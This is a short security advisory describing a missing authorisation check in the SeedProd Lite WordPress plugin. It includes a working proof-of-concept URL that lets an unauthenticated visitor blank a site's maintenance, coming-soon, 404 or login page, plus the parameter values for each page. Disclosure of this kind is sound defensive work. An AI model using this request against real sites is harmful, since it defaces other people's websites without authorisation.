Description The plugin does not have authorisation in its seedprod_lite_new_lpage function, allowing unauthenticated attackers to update the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin to a blank state
As unauthenticated, open the following URL to put the Maintenance Mode page as blank: https://example.com/wp-admin/admin-post.php?page=seedprod_lite_template&id=0&type=mm
To update other page, change the type parameter accordingly:
- cs for Coming Soon
- mm for Maintenance Mode
- p404 for 404
- loginp for Login Page